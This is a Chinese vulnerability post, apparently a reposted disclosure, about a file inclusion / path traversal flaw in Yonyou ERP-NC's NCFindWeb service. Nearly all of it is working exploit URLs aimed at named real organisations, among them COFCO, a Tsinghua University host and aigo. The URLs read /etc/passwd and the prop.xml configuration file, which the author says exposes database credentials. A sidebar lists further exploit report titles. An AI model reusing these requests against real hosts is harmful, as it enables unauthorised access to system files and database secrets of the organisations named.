用友ERP-NC某处通用文件包含漏洞

没穿底裤

714
文章

0
评论

2020年1月1日03:44:16评论6,065 views字数 993阅读3分18秒阅读模式

摘要

可以遍历各种系统文件，影响大量知名政校企中粮集团

http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

漏洞作者：管管侠

详细说明：

可以遍历各种系统文件，影响大量知名政校企

漏洞证明：

中粮集团

http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

还可以读取默认配置文件

http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

下面有中粮几十组数据库配置，数据库群

民生电商

http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

数据库配置

http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

清华大学

http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml

爱国者

http://nc.aigo.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

以下也都是有效案例

http://nc.bcegc.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

http://oa.tianue.com:8888/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd

.........

左青龙
微信扫一扫

右白虎
微信扫一扫

用友ERP-NC某处通用文件包含漏洞

漏洞作者：管管侠

详细说明：

漏洞证明：

微擎普通用户权限SQL注入漏洞

无需登录-悟空CRM 存储型XSS

cacti 0.8.8g cdef.php selected_items 存在sql注入

ZwelL通用图片上传漏洞

discuz某插件设计缺陷可前台getshell

Seacmsv6.25 two sql inject

深信服数据中心2.0某处存在命令执行漏洞

Z-blog前台无需登录包含漏洞一枚

发表评论

在线咨询

微信

漏洞作者： 管管侠

详细说明：

漏洞证明：

发表评论

在线咨询

微信

漏洞作者：管管侠